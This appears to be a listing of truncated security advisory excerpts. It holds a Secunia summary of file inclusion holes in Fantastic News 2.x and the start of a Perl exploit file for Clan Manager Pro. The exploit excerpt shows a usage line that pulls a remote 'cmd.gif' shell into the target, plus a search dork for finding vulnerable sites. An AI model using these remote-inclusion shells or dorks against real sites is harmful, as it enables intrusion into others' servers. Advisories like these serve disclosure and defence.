[SA21807] Fantastic News "CONFIG[script_path]" File Inclusion Vulnerabilities

TITLE: Fantastic News "CONFIGscriptpath" File Inclusion Vulnerabilities SECUNIA ADVISORY ID: SA21807 VERIFY ADVISORY: http://secunia.com/advisories/21807/ CRITICAL: Highly critical IMPACT: System access WHERE: From remote SOFTWARE: Fantastic News 2.x http://secunia.com/product/6254/ DESCRIPTION:...

cmpro-1.1.txt

Hi, http://sx02.coresec.de/advisories/149.txt -- cut here -- !/usr/bin/perl Clan Manager Pro CMPRO perl cmpro.pl http://localhost/path/to/cmpro.extern/ http://localhost/cmd.gif cmd cmd shell example: cmd variable: cmd; DORK: inurl:"cmpro.ext" Vulnerable code cmproheader.inc.php...